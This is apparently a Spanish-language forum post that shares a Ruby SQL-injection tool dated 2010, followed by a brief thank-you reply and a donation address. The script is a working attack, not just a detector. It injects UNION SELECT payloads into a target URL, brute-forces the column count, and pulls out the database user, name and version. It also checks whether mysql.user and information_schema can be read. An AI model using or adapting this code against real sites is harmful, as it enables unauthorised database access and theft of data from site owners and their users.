Un scanner de SQLI en ruby
#!usr/bin/ruby
#SQLI Scannerl (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
  print "\n[+] sqli.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def details(web,more) 
web1 = more.sub(/hackman/,"0x4b30425241")
more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
print "\n\n[+] Extrating information of the DB\n\n"
url = URI.parse(web)
code = toma(url.host,url.path+"?"+url.query+more)
if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
  print "[username] : "+$1+"\n"
  print "[database] : "+$2+"\n"
  print "[version] : "+$3+"\n\n"

test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

if test1=~/K0BRA/
  print "[information_schema.tables] : ON\n"
end

if test2=~/K0BRA/
 print "[mysql.user] : ON"
end


else 
  print "\n[-] Not Found\n\n"
end
end


def scan(web)
print "\n[+] Testing the vulnerability SQLI...\n\n"
url = URI.parse(web)
codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
if codetest=~/The used SELECT statements have a different number of columns/
  print "[+] SQLI Detected\n\n"
  else
  print "[-] Not Vulnerable to SQLI\n\n"
  copyright()
end

z = "1"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
#print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data\n\n"
z = z.sub($1,"hackman")
print "[SQLI] : "+web+"-1+union+select+"+z
details(web,"-1+union+select+"+z)
copyright()
end
end
print "\n\n[-] Not Found the numbers of the columns\n\n"
copyright()
end

def head() 
  print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0]) 
  copyright()  
end
copyright()

#The End ?
gracias doddy,la voy a tratar a ver como anda. Saludos
Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
Responder

Volver a “Fuentes”